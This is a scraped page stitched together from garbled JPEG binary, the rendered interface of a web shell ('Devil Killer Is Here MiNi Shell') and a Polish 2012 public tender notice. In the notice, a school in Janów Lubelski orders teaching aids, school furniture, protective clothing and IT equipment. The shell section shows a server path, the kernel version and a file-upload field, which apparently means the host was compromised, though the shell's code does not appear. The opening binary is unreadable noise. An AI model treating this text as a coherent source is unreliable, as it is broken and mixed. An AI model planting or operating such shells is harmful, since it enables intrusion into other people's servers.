JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121206/258409-N-2012.html

<p class="kh_header"><b>Janów Lubelski: Dostawa pomocy dydaktycznych, mebli szkolnych, odzieży ochronnej oraz sprzętu informatycznego w ramach projektu Młodzi, zdolni zawodowcy</b><br>
<b>Numer ogłoszenia: 258409 - 2012; data zamieszczenia: 06.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół , ul. J. Zamoyskiego 68, 23-300 Janów Lubelski, woj. lubelskie, tel. 15 87-20-843, faks 15 87-20-843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzz.zsjanow.fc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych, mebli szkolnych, odzieży ochronnej oraz sprzętu informatycznego w ramach projektu Młodzi, zdolni zawodowcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I. - Pomoce dydaktyczne do matematyki - Zbiór zadań z matematyki 190 szt, Plansza 7 sz, Zestaw brył transparentnych 1 szt, Ostrosłupy 1 szt, Graniasto-słupy 1 szt, Kalkulator 190 szt, Zeszyt w kratkę A4 190 szt, Zestaw kolorowych długopisów 190 sz, Zestaw przyborów tablicowych (linijki, ekierki, cyrkle) 1 kpl, II. do j.angielskiego - Podręczniki i ćwiczenia do nauki języka 190 szt, Kieszonkowy słowniczek angielsko-polski 30 sz, Słownik do języka angielskiego 4 sz, Atlas do języka angielskiego 4 sz, Zestaw plansz do języka angielskiego (słownictwo, gramatyka, mapy) 20 sz, Plansza interaktywna 1 szt, Zeszyt w kratkę A4 190 szt, III. Do j. niemieckiego - Kieszonkowy słownik polsko - niemiecki 10 szt , Podręczniki i ćwiczenia do nauki języka zawodowego 10 sz, Słownik do języka niemieckiego 4 szt, Atlas do języka niemieckiego 4 szt. Zestaw plansz do języka niemieckiego (słownictwo, gramatyka) 20 szt, Plansza interaktywna 1 szt, Zeszyt w kratkę A4 10 szt, IV. Do j.rosyjskiego - Słownik polsko rosyjski 10 szt, Podręcznik i ćwiczenia do nauki j.zawodowego rosyjskiego 10 szt, Słownik do języka rosyjskiego, Atlas do j. rosyjskiego 4 szt, Zestaw plansz do j. rosyj-skiego (słownictwo, gramatyka) 20 szt, Zeszyt w kratkę A4 10 sz, Zestaw zadań egzaminacyjnych przygo. do dyplomu 92 szt, Papier, grzbiety, okładki do bindowania 73 szt, V Do przedmiotów zawodowych - Książka do nauki barmaństwa 1 sz, Podrę-cznik do nauki rzeźbienia w owocach i warzywach 5 szt, Kpl podręczników w zaj. wyrów. kl. II w zawodzie toug 10 szt, Kpl podręczników w zaj. wyrów. kl I w zawodzie toug 10 szt, Kpl. Podręczni-ków w zaj. wyrów. kl II w zawodzie t. log, 10 szt, Kpl podręczników w zaj. wyrów. kl II w zawodzie t. hot 10 szt, Kpl podręczników w zaj. wyrów. kl I w zawodzie t. hot 10 szt, Kpl. podręczników w zaj. wyrów. kl II w zawodzie t. leśn 10 sz, Kpl podręczników w zaj. wyrów. kl I w zawodzie t. leśn10 szt, Zestaw modeli środków transportu 1 szt, VI. Logistyka - Mapa ścienna 6 szt, Plansza dydaktyczna 6 szt, Poradniki i podręczniki5 szt, Album 8 szt, Regulamin i kodeksy 5 szt, Dwumiesięcznik Logistyka 10 szt, Dwumiesięcznik nowoczesny magazyn 10 szt, VII Przyroda - Plansza interaktywna1 szt, Mikroskop z kamerą 1 szt, Szkło laboratoryjne 1 zestaw, Plansza dydaktyczna 3 szt, Modele przyrodnicze 5 kpl, Zestaw preparatów 2 zestawy, Zestaw odczynników 1 zestaw, VIII SZOK - Filmy DVD z zakresu doradztwa zawodowego 1 kpl. Szczegółowy opis części I został opisany w zał. nr 1 do SIWZ. Część II - Meble szkolne I - Pracownia matematyczna. Regał na modele do pracowni 1 szt, Stoliki dwuosobowe 15 szt, Krzesełka szkolne 30 szt, Stolik i krzesło dla nauczyciela (komplet) 1 szt, Tablica szkolna zielona do pracowni 1 szt, II - Pracownia językowa, Stoliki i krzesełka ze słuchawkami do pracowni językowej 1 kpl i tablica biała 1 szt. III - Pracownia obsługi konsumenta: Krzesełka 24 szt, Stoliki prostokątne 8 szt, Stoliki półokrągłe 4 szt, Regały na szkło i sprzęt (zestaw robiony na zamówienie) 1 zestaw, Tablica biała 1 szt. IV - Pracownia gastronomiczna: Stołki do siedzenia dla uczniów15 szt. V - Pracownia logistyczna: Biurka i krzesełka 13 kpl. VI- Pracownia przyrodnicza: Stoliki dwuosobowe 15 szt, Krzesełka dla uczniów 30 szt. Stolik i krzesło dla nauczyciela 1 kpl, Szczegółowy opis części II został opisany w zał. nr 2 do SIWZ. Część III - Regały na szkło i sprzęt (zestaw robiony na zamówienie) do pracowni obsługi konsumenta. . Szczegółowy opis części III został opisany w zał. nr 3 do SIWZ. Część IV - Odzież ochronna: Komplet odzieży ochronnej dla uczestnika zajęć obsługi pilarki ( kask, spodnie, buty, rękawice) antyprzecięciowe 10 kpl, Komplet odzieży roboczej dla ucznia odbywającego staż z technikum organizacji usług gastronomicznych 50 kpl, Komplet odzieży roboczej dla ucznia odbywającego staż z technikum leśnego 20 kpl, Komplet odzieży roboczej dla ucznia odbywającego staż z technikum logistycznego 15 kpl, Komplet odzieży roboczej dla ucznia odbywającego staż z technikum hotelarskiego15 kpl, Stroje kelnerskie 10 kpl. Szczegółowy opis części IV został opisany w zał. nr 4 do SIWZ. Część V - Wyposażenie pracowni logistycznej: Zestaw sprzętu logistycznego zestaw 1, Oprogramowanie szt.1, Zestaw materiałów eksploatacyjnych, logistycznych zestaw 1, Mapa multimedialna szt. 1, Podręcznik do logowania na platformie Eel-edu szt. 12, Oprogramowanie tras przewozowych szt. 1, Gra symulacyjna przedsiębiorstwa transportowego szt. 5. Szczegółowy opis części V został opisany w zał. nr 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9, 39.10.00.00-3, 39.13.00.00-2, 39.16.00.00-1, 39.11.00.00-6, 39.15.10.00-5, 39.14.10.00-2, 18.13.00.00-2, 72.51.10.00-0, 22.11.40.00-2, 22.47.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy. 
2. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy. 
3. Zmiany terminów dostaw na przedmiot umowy, jeżeli ze względu na wypadek losowy nie będzie możliwe przeprowadzenia dostawy.
4. Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy. 
5. Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. 
6. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzz.zsjanow.fc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół w Janowie Lubelskim
ul. Zamoyskiego 68
23-300 Janów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 09:30, miejsce: Zespół Szkół w Janowie Lubelskim
ul. Zamoyskiego 68
23-300 Janów Lubelski
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Młodzi, zdolni zawodowcy współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pomocy dydaktycznych do prowadzenia zajęć z matematyki, języka zawodowego angielskiego, niemieckiego i rosyjskiego oraz przedmiotów zawodowych i wyrównawczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pomocy dydaktycznych do matematyki - Zbiór zadań z matematyki 190 szt, Plansza 7 sz, Zestaw brył transparentnych 1 szt, Ostrosłupy 1 szt, Graniasto-słupy 1 szt, Kalkulator 190 szt, Zeszyt w kratkę A4 190 szt, Zestaw kolorowych długopisów 190 sz, Zestaw przyborów tablicowych (linijki, ekierki, cyrkle) 1 kpl, II. Do j.angielskiego - Podręczniki i ćwiczenia do nauki języka 190 szt, Kieszonkowy słowniczek angielsko-polski 30 sz, Słownik do języka angielskiego 4 sz, Atlas do języka angielskiego 4 sz, Zestaw plansz do języka angielskiego (słownictwo, gramatyka, mapy) 20 sz, Plansza interaktywna 1 szt, Zeszyt w kratkę A4 190 szt, III. Do j. niemieckiego - Kieszonkowy słownik polsko - niemiecki 10 szt , Podręczniki i ćwiczenia do nauki języka zawodowego 10 sz, Słownik do języka niemieckiego 4 szt, Atlas do języka niemieckiego 4 szt. Zestaw plansz do języka niemieckiego (słownictwo, gramatyka) 20 szt, Plansza interaktywna 1 szt, Zeszyt w kratkę A4 10 szt, IV. Do j.rosyjskiego - Słownik polsko rosyjski 10 szt, Podręcznik i ćwiczenia do nauki j.zawodowego rosyjskiego 10 szt, Słownik do języka rosyjskiego, Atlas do j. rosyjskiego 4 szt, Zestaw plansz do j. rosyj-skiego (słownictwo, gramatyka) 20 szt, Zeszyt w kratkę A4 10 sz, Zestaw zadań egzaminacyjnych przygo. do dyplomu 92 szt, Papier, grzbiety, okładki do bindowania 73 szt, V Do przedmiotów zawodowych - Książka do nauki barmaństwa 1 sz, Podrę-cznik do nauki rzeźbienia w owocach i warzywach 5 szt, Kpl podręczników w zaj. wyrów. kl. II w zawodzie toug 10 szt, Kpl podręczników w zaj. wyrów. kl I w zawodzie toug 10 szt, Kpl. Podręczni-ków w zaj. wyrów. kl II w zawodzie t. log, 10 szt, Kpl podręczników w zaj. wyrów. kl II w zawodzie t. hot 10 szt, Kpl podręczników w zaj. wyrów. kl I w zawodzie t. hot 10 szt, Kpl. podręczników w zaj. wyrów. kl II w zawodzie t. leśn 10 sz, Kpl podręczników w zaj. wyrów. kl I w zawodzie t. leśn10 szt, Zestaw modeli środków transportu 1 szt, VI. Logistyka - Mapa ścienna 6 szt, Plansza dydaktyczna 6 szt, Poradniki i podręczniki5 szt, Album 8 szt, Regulamin i kodeksy 5 szt, Dwumiesięcznik Logistyka 10 szt, Dwumiesięcznik nowoczesny magazyn 10 szt, VII Przyroda - Plansza interaktywna1 szt, Mikroskop z kamerą 1 szt, Szkło laboratoryjne 1 zestaw, Plansza dydaktyczna 3 szt, Modele przyrodnicze 5 kpl, Zestaw preparatów 2 zestawy, Zestaw odczynników 1 zestaw, VIII SZOK - Filmy DVD z zakresu doradztwa zawodowego 1 kpl. Szczegółowy opis części I został opisany w zał. nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mebli szkolnych do pracowni gastronomicznej, przyrodniczej, logistycznej, obsługi konsumenta, matematycznej i języków zawodowych obcych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1. Regał na modele do pracowni matematycznej. Regał - szafa z witryną zamykana na klucz (górna połowa za szkłem , dolna zamknięte półki) Wymiary 1960x800x400, płyta wiórowa- melanina, białe fronty, korpus grafitowy, uchwyty podłużne (33,7 cm) malowany MDF na zielono. 2. Stoliki dwuosobowe do prac. mat., wzrost ucznia 159-188, wym. blatu 1300x500x18 mm, stelaż rura śr. 28mm, kolor stelaża zielony regulacja poziomu, wysokość 76 cm. 3. Krzesełka szkolne do prac. mat. Krzesło o stelażu zielonym, wzrost ucznia 159-188, siedzisko i oparcie sklejka liściasta, rura śr. 22mm, wys. do siedziska 460mm, wys. do oparcia 820 mm, 4. Stolik i krzesło dla nauczyciela (komplet) do prac mat. Biurko o rozm. min 1500x 600x760 z szufladą i szafką zamykaną pod biurkiem, front i blenda w kolorze białym, korpus w kolorze grafitowym, płyta wiórowa -melanina, uchwyty zielone, przerwa między blatem a szafką na dokumenty, krzesło obrotowe tapicerowane z regulacją w kolorze jasno zielonym, średnica podstawy 645mm, reg. wys. 440-570, reg. wys. oparcia 955-1115, podłokietniki plastikowe, mechanizm ctp. 5. Tablica szkolna zielona do pracowni mat. Tablica składana zielona w kratkę 3400x 1000, półka na kredę oraz zestaw do montażu na ścianę. 6. Stoliki i krzesełka ze słuchawkami do pracowni językowej (komplet-pracownia językowa); 20 szt. stanowisk uczniowskich prostych - (10 biurek 2 os.)wykonane z płyty wiórowej gr. 18mm okleina PCV wymiary szer. 1200x550x750, osłona umożliwia montaż słuchawek oraz przyłączeniowego stanowiska uczniowskiego, wbudowany kanał kablowy, wieszaki do słuchawek 21szt, Słuchawki z mikrofonem dla 20 uczniów i 1 nauczyciela MPJ 888; krzesło dla ucznia oparcie i siedzisko wykonane ze sklejki liściastej stelaż malowany proszkowo 20x20 w kolorze, wzmacniacz stereofoniczny z dwoma głośnikami do zabudowy w biurku moc 170 wat, krzesło tapicerowane dla nauczyciela, biurko dla nauczyciela wykonane z płyty wiórowej 18 mm okleina PCV wym. szer. 1500*550*750, pulpit dotykowy z jednostka centralną z wbudowanym modułem Interactive oraz z odpowiednim oprogramowaniem, gniazdo USB, moduł symulacji rozmów telefonicznych, niezbędne do działania układy elektroniczne, przełączenia, okablowanie, transport, montaż. 7. Tablica biała, Tablica składana biała 3400x 1000, półka na pisaki, 2 zestawy pisaków, zestaw do montażu na ścianę. 8. Krzesełka do prac. obsł. konsumenta; Krzesło drewniane kolor orzech ciemny, tapicerka eko skóra kolor kremowy, lite drewno bukowe, 95 cm wys. całkowita, 42 cm gł. siedziska, 44 cm szer. siedziska, wys. siedziska 46cm, tył przedłużany w całości eko skóra kremowa lub ecri. 9. Stoliki prostokątne do prac. obsł. konsumenta rozm 1200*1800 (2 szt. ze składanymi nogami ).Nogi chromowane, Blat z płyty 25 mm dwustronnie melaminowej - krawędzie oklejone na gorąco 2mm obrzeżem PCV w kolorze venge lub ciemny brąz. 10. Stoliki półokrągłe do prac.  obsł. Konsumenta 1600*800 (2 szt ze składanymi nogami ).Nogi chromowane, Blat z płyty 25 mm dwustronnie melaminowej - krawędzie oklejone na gorąco 2mm obrzeżem PCV w kolorze venge lub ciemny brąz. 11. Tablica biała ; Tablica biała 1700x 1000, półka na pisaki, zestaw do montażu na ścianę. 12. Stołki do siedzenia dla uczniów do prac. gastr.; Taboret: siedzisko okrągłe ze skóry w kolorze kremowym, wys. 460 mm, nogi chromowane. 13. Zestaw biurko i krzesełka do pracowni logist: Stolik jednoosobowy z regulacją wysokości, rozm. blatu 700x500m, stelaż o średnicy 35 mm, kolor czerwony, płyta melaminowa, obrzeże PCV 2mm.,wzrost ucznia 159-188 oraz krzesło tapicerowane w kolorze brązowym, tapicerowane siedzisko i oparcie, 46 cm wys. siedziska, 54cm szer. siedziska, nogi chrom. 14. Stoliki dwuosobowe do prac. przyr., wzrost ucznia 159-188, wym. blatu 1300x500x18 mm, stelaż rura śr. 28mm, kolor stelaża zielony regulacja poziomu, wysokość 76 cm. 15. Krzesełka szkolne do prac. 